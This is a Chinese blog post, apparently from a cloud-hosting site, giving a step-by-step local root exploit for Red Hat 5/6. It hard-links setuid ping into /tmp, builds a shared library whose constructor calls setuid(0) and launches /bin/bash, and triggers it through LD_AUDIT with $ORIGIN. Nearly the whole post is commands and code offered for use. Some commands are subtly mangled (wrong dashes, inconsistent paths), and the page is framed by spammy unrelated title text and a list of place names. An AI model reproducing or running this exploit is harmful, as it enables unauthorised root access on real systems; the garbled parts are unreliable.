91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Redhat利用漏洞提權

發布時間:2020-07-21 12:41:09 來源:網絡 閱讀:4589 作者:jikecom 欄目:安全技術

漏洞試用系統:redhat 56通用

 

.利用/tmp擁有777的權限

/tmp下創建一個exploit目錄

 

ln   /bin/pingping命令的權限很特殊是S,可以在普通用戶使用這個命令的時候瞬間擁有這個命令的屬主權限,這里是root

 

ln /bin/ping  /tmp/exploit/target

exec  3<  /tmp/exploit/target

rm  -rf  /tmp/exploit/


 

 

.vim編寫一段C語言程序(文件名payload.c

 

void  __attribute__((constructor))  init()  //這里__是兩個下劃線

{

         setuid(0);

         system(“/bin/bash”);

}


 

使用GCC把這個文件編譯一下

 

Gcc -w –fpic –shared –o /tmp/exploit payload.c

 

 

.執行

 

LD_AUDIT=”\$ORIGIN”  exec/proc/self/fd/3


向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

漠河县| 营山县| 准格尔旗| 贺兰县| 沾益县| 修武县| 顺昌县| 航空| 辉县市| 新乐市| 西林县| 喀喇沁旗| 龙川县| 酒泉市| 泰宁县| 吴忠市| 马边| 平顺县| 万年县| 连江县| 米易县| 丹寨县| 平昌县| 恩施市| 兖州市| 北流市| 威海市| 扎兰屯市| 土默特右旗| 榆社县| 迭部县| 金阳县| 浦城县| 东辽县| 石楼县| 通许县| 阿合奇县| 云梦县| 唐山市| 喀什市| 灵寿县|